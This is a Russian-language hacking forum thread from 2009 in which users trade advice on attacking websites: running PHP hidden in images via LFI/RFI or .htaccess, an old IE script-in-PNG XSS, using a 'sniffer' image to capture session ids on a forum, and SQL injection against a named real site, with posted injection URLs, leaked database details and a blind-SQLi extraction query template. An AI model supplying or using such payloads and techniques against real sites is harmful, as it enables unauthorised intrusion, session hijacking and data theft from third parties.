Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,364
    Likes Received:
    1,150
    Reputations:
    430
    Если нет лфи/рфи то как написал Пако, надо добавлять add type чтобы гифка исполнялась как пхп
     
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    .htaccess ? Если через него то у меня же нету доступа к серву
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    diznt
    Вот это твоя аватарка?
    https://forum.antichat.ru/avatars/avatar49286.gif
    Ты её сам залил?

    Ты как думаешь, если-бы можно было .gif файлы просто так исполнять, то долго бы этот форум прожил?

    Надо иногда наверное и самому подумать, тем более:
     
    2 people like this.
  4. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,705
    Likes Received:
    1,225
    Reputations:
    455
    2 diznt то, что ты видел - это возможна XSS бага старого IE
    когда в конец png файла можно былобы приписать html/javascript и он выполнилсябы при просмотре данной картинке. Но этот баг вроде существовал еще во времена IE 5. если не раньше.
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    ну во-первых не gif, а png
    Встаялешь в конец картинки <script>alert(/olololo/)</script>, заливаешь на сайт и смотришь картинку. Работает только в IE
     
    1 person likes this.
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ничего актуального тут нет - только при LFI или RFI возможно исполнить код, зашитый в картинку, без вариантов. Или загрузить .htaccess, в котором будет прописано, что .jpg или .gif или еще какое расширение будет выполняться как php-скрипт. Всё.

    А баги, работавшие в IE5-6 уж точно неактуальны:)
     
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    такое редко юзают, енто раз.

    Во вторых я не думаю что на античате такое бы было %)
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    Да как слеш написал это бага старого эксплорера, правда работало не толкьо в 5.5 но и в 6-ой версии
     
  9. LeRick

    LeRick New Member

    Joined:
    6 Jun 2009
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Подскажите новичку, пожалуйста.
    На одном вап-сайте вставил в форум картинку-сниффер. В логах получаю такие данные: http:/ /sait.ru/member.php?sid=7cda1b46636bc1a8d88898246a615fa6&a=forum&f=4&t=1075&
    Переходил по такой ссылке в течение 1й минуты после получения, но почему-то выкидывает на главную страницу.
    Можно ли вобще как-то использовать данную информацию?
     
  10. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    www.reznik.pri.ee/document.ph_p?id=138
    Как узнать скока сталбцоф ? Пробавал черес order by . А union select никак .. Потскожыте
    Или приведите пример
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.reznik.pri.ee/document.php?id=209+AND+SUBSTRING((version()),1,1)=5--

    version: 5.1.34-log
    database: np2482_reznik
    user: np2482_reznik@localhost
    os: pc-linux-gnu
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ckорее всего никак, т.к. JOIN

    видю только слепую скулю:

    А вообще думать надо, кого ломаешь, там же афганцы
     
    1 person likes this.
  13. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Я ломат несобераюс .. Проста некак немогу подобрат столпцы ... поетаму и спрашевал . А версия мне ненужна . Всё спс
     
    #7973 Saiga, 9 Jul 2009
    Last edited: 9 Jul 2009
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    Saiga тебе говорят что там слепая, а ты заладил столбцы да столбцы
     
  15. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    32
    Likes Received:
    2
    Reputations:
    -1

    эту скулю можно раскрутить толькоподбором, тоесть допустим делаем примерно такой запрс
    www.reznik.pri.ee/document.php?id=138 and exists (select table_name from (select table_name from information_schema.tables where table_schema = database() limit [PARAM],1) a where ascii(substr(table_name,[SymbolNumber],1))>[GM])

    все что в квадратных скобках - это переменные значения
    [GM]- код символа
    [Param] - думаю сам догадаешься...
    [SymbolNumber] - это номер символа в текущем [Param]

    примерно так, если вручную то муторно и долго...
    Советую написать скрипт для перебора
     
    #7975 peonix, 10 Jul 2009
    Last edited: 10 Jul 2009
    1 person likes this.
  16. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    32
    Likes Received:
    2
    Reputations:
    -1
    забыл написать, если условие выполнится то страница загрузится без ошибок, если нет, то соответственно будет пустой...
     
  17. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    peonix

    Если это всё за правду то огромное спс тебе ))

    Будет время буду пробавать
     
  18. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    // Без ответа
     
  19. genadiez

    genadiez Member

    Joined:
    26 Dec 2008
    Messages:
    43
    Likes Received:
    16
    Reputations:
    0
    SQL через header возможно ли это?

    Всем еще раз доброго дня.

    У меня вопрос к специалистам по SQL-inj:

    Тестировал один сайт на уязвимости с помощью Acunetix и он показал что определенное место предположительно уязвимо под sql инъекцию.
    Но проблема в том, что меняется параметр client-ip из http header в него подставляется ' и сервер выдает
    Query:
    Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1247058998'' at line 1

    (это все отображается при запуске указаннрй уязвимости через HTTP Editor, как я понял он изменяет данные служебного заголовка)
    Если забивать в строку URL путь до якобы уязвимого php файлика, идет автоматическая переадресация.
    Так вот, если кто знает как такую штуку возможно раскрутить, если вообще возможо,
    в частности, можно ли этот client-ip передать через url браузера (как при обычных sql-inj)?
    Буду крайне признателен за совет!
     
    #7979 genadiez, 10 Jul 2009
    Last edited: 10 Jul 2009
  20. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    2nub-hacker, ты прежде чем написать хотя бы попробовал что-нибудь предпринять. Ты мог бы уже раз 150 установить Denwer, поставить нужную phpbb и проверить допустимое количество символов при реге, убедившись, что там минимальное значение один символ.
     
Loading...
Thread Status:
Not open for further replies.